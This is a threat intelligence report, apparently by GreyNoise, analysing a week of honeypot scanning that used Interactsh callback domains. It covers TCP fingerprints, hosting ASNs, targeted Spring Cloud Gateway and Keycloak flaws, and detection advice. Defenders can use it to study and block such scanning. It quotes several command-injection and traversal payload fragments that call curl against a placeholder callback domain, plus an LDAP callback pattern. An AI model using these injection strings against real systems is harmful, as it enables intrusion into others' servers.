GreyNoise observed 9,004 honeypot sessions from 313 unique IP addresses conducting coordinated vulnerability scanning with OAST callback infrastructure between January 17-23, 2026. Analysis identified 425 distinct scanning campaigns leveraging Interactsh OAST services, with anomalous TCP fingerprinting (MSS=65495) indicating custom scanning tooling or modified network stacks across multiple threat actors.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author
🔮Orbie✨
Published
January 24, 2026
Overview
GreyNoise sensors captured extensive scanning activity targeting web application vulnerabilities with Out-of-band Application Security Testing (OAST) callback domains embedded in exploit payloads. The activity spanned seven days with peak concentration on January 19 (3,548 sessions from 13 IP addresses), indicating a shift from distributed reconnaissance to focused exploitation attempts.
Fingerprint analysis revealed two distinct infrastructure patterns: standard Linux-based scanning (JA4T: 64240_2-4-8-1-3_1460_7, matched to WSL Ubuntu 22.04 in the JA4 database) and anomalous TCP configurations (JA4T: 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7) with non-standard Maximum Segment Size values suggesting custom tooling.
OAST domain extraction and decoding produced 5,171 unique callback domains across six Interactsh providers (oast.site, oast.live, oast.me, oast.pro, oast.fun, oast.online), with campaign identifiers revealing 425 separate scanning operations. The top campaign (“nualr”) generated 1,450 unique OAST domains, while the second-largest (“or3ki”) produced 270 domains.
Infrastructure analysis indicates VPS and bulletproof hosting provider concentration, with the top source IP (146.70.116.218, AS9009 M247 Europe SRL, Austria) responsible for 41.8% of all observed sessions.
Temporal Analysis
Date
Sessions
Unique IPs
Peak Hour Activity
Notable Patterns
Jan 17
950
156
14:00 UTC (212 sessions)
Distributed reconnaissance phase
Jan 18
2,991
261
06:00 UTC (180 sessions)
Activity escalation across multiple IPs
Jan 19
3,548
13
08:00-11:00 UTC
Concentrated exploitation from AS9009
Jan 20
681
10
Sustained throughout day
Post-peak activity continuation
Jan 21
246
25
Intermittent bursts
Campaign wind-down
Jan 22
471
13
Low sustained activity
Residual scanning
Jan 23
117
13
Sporadic sessions
Campaign conclusion
The temporal distribution reveals a classic three-phase pattern: initial distributed reconnaissance (Jan 17), scaling exploitation (Jan 18-19), and sustained lower-volume activity (Jan 20-23). The sharp concentration on January 19 with only 13 source IPs generating 3,548 sessions indicates a transition from broad scanning to focused exploitation infrastructure.
Primary Campaign Analysis
Campaign 1: Spring Cloud Gateway Code Injection (Dominant)
This campaign represents the majority of observed activity and demonstrates sophisticated scanning infrastructure. The consistent use of OAST callbacks across exploit attempts indicates automated tooling designed to detect successful exploitation through out-of-band DNS/HTTP callbacks.
Infrastructure Characteristics: - Anomalous MSS value (65495) in 2,096 sessions suggests custom TCP stack or modified scanning tool - 232 unique IPs associated with primary fingerprint cluster - Geographic distribution: Austria, Singapore, Malaysia, United Kingdom, France, India, United States - ASN concentration: AS9009 (M247 Europe), AS47583, AS55836, AS14061 (DigitalOcean), AS64457, AS51167 (Contabo)
The distinct machine IDs and PIDs indicate at least three separate scanning instances contributing to this campaign, likely coordinated infrastructure or distinct operators using similar tooling.
Campaign 2: Keycloak Open Redirect CVE-2024-8883
Sessions: 296
Unique IPs: 2-3 distinct
Primary Fingerprint: Various (distributed across multiple fingerprints)
This secondary campaign represents focused exploitation attempts against Keycloak authentication systems. The low IP count (2-3 sources) with 296 sessions indicates high-volume automated scanning from concentrated infrastructure.
Additional exploitation vectors identified: - Command injection: /ddns_check.ccp with curl https://[OAST-DOMAIN] in parameters - XML external entity (XXE): /sitecore/shell/ClientBin/Reporting/Report.ashx with LDAP OAST callbacks - Directory traversal with command execution: /misc/curl${IFS}[OAST-DOMAIN]/..;/index.html
All payloads demonstrate callback verification strategy - attackers use OAST domains to detect successful exploitation when direct response observation is not reliable.
Infrastructure Analysis
Fingerprint Clustering
JA4T Fingerprint
JA4H Fingerprint
Sessions
Unique IPs
MSS
Identified OS/Tool
65495_2-4-8-1-3_65495_7
po11nn060000_4ea4093e6290
2,096
232
65495
Custom/Unknown
64240_2-4-8-1-3_1460_7
po11nn060000_4ea4093e6290
1,002
188
1460
WSL Ubuntu 22.04
65495_2-4-8-1-3_65495_7
ge11nn06en00_0e5d97bc8ad6
761
7
65495
Custom/Unknown
65495_2-4-8-1-3_65495_7
ge11nn040000_8391bea91fb6
471
3
65495
Custom/Unknown
65495_2-4-8-1-3_65495_7
ge11nn040000_532a1ee47909
371
10
65495
Custom/Unknown
Key Finding: The MSS value of 65495 is highly anomalous. Standard Ethernet MTU produces MSS=1460. The 64,035 byte delta suggests:
Custom network stack modification in scanning tool
Unusual VPN/tunnel configuration
Deliberately anomalous fingerprinting to avoid detection signatures
This fingerprint cluster accounts for 4,012 sessions (44.6% of total activity) and appears across 215 unique JA4T+JA4H combinations, indicating either a single widely-deployed tool or multiple tools sharing similar TCP stack configurations.
ASN Distribution
ASN
Organization
Country
Sessions
Top IP
Fingerprint Pattern
AS9009
M247 Europe SRL
Austria
3,766
146.70.116.218
MSS=65495 dominant
AS200019
ALEXHOST SRL
Moldova
560
193.233.202.173
MSS=65495
AS27176
DataWagon LLC
United States
488
103.60.12.224
MSS=1460
AS150654
Kennies Star India Pvt Ltd
India
444
38.225.206.91
Mixed
AS51167
Contabo GmbH
France/UK
447
Multiple
MSS=65495 and 1460
AS14061
DigitalOcean LLC
Singapore/US
297
Multiple
MSS=65495 and 1460
Infrastructure is heavily concentrated in VPS and bulletproof hosting providers. AS9009 (M247 Europe) accounts for 41.8% of all sessions from a single IP address (146.70.116.218), active January 19-20 with 3,766 sessions over 27 hours.
Attribution Assessment
Confidence: Medium
Evidence for coordinated operations:
425 distinct OAST campaign identifiers decoded from callback domains
Consistent targeting of Spring Cloud Gateway across multiple fingerprint clusters
Shared OAST provider infrastructure (Interactsh) across campaigns
Temporal clustering suggests campaign coordination or shared tasking
Evidence for distinct operators:
Wide variance in JA4T+JA4H fingerprint combinations (215 unique pairings)
Different machine IDs in OAST decoded data (indicating separate scanning instances)
Geographic and ASN distribution suggests distributed infrastructure rather than single operator
Mixed use of standard Linux fingerprints (WSL Ubuntu) and anomalous TCP stacks
Assessment:
This activity likely represents multiple threat actors or scanning operations using similar tooling (likely Interactsh-based vulnerability scanners). The anomalous MSS=65495 fingerprint may indicate a specific commercial or open-source scanning tool with custom network configuration, deployed by multiple operators. The concentration in VPS/bulletproof hosting infrastructure is consistent with opportunistic scanning campaigns rather than targeted intrusions.
The decoded OAST campaign identifiers suggest at least 425 separate scanning instances, though many may be retrying operations or parallel scanning from the same infrastructure. The top three campaigns (nualr, or3ki, mmr8b) account for 1,878 domains (36.3% of decoded OAST callbacks) and likely represent the most active operators.
Combined JA4T+JA4H pairs provide highest fidelity for detection (see Infrastructure Analysis table above for top combinations).
Detection Recommendations
Block or alert on source IPs associated with AS9009, AS200019, AS27176, AS150654 when combined with OAST callback patterns (see Network IOCs section for full list).
Monitor for JA4T fingerprints with MSS=65495 - this anomalous value is rare in legitimate traffic and strongly correlated with scanning activity in this dataset. Network defenders should create alerts for TCP connections with this characteristic MSS value.
Implement JA4 fingerprint-based detection rules for the top 5 JA4T+JA4H combinations listed in Infrastructure Analysis. These fingerprints account for 4,701 sessions (52.2% of total activity).
Prioritize patching Spring Cloud Gateway vulnerabilities - this framework represents the primary target across observed campaigns. Organizations running Spring Cloud Gateway should audit versions and apply available security updates.
Patch Keycloak CVE-2024-8883 if using affected versions - while lower volume, this vulnerability was actively scanned and represents a viable attack vector for authentication bypass.
Implement DNS monitoring for Interactsh OAST domains - all six Interactsh providers (oast.site, oast.live, oast.me, oast.pro, oast.fun, oast.online) were observed. Outbound DNS queries or HTTP connections to these domains from internal infrastructure indicate potential successful exploitation.
WAF rules for OAST callback patterns - implement detection for URL-encoded OAST domain patterns in HTTP parameters, particularly in Spring Cloud Gateway endpoints (/hystrix/*) and authentication flows.
Alert on command injection payloads with curl, certutil, wget, or similar download utilities followed by external domain names in web request parameters.
Monitor for LDAP OAST callback attempts - some payloads use LDAP protocol for out-of-band callbacks (ldap://[OAST-DOMAIN]/), particularly in XXE exploitation attempts.
Implement rate limiting on vulnerable endpoints - the high session volume from individual IPs (3,766 from a single source) demonstrates lack of rate limiting as a contributing factor.
metadata.asn:(AS9009 OR AS200019 OR AS27176 OR AS150654) tags:"Contains Well-known Out-of-band Interaction Domain"
metadata.asn:(AS9009 OR AS200019 OR AS27176 OR AS150654) tags:"Generic Contains Well-known Out-of-band Interaction Domain"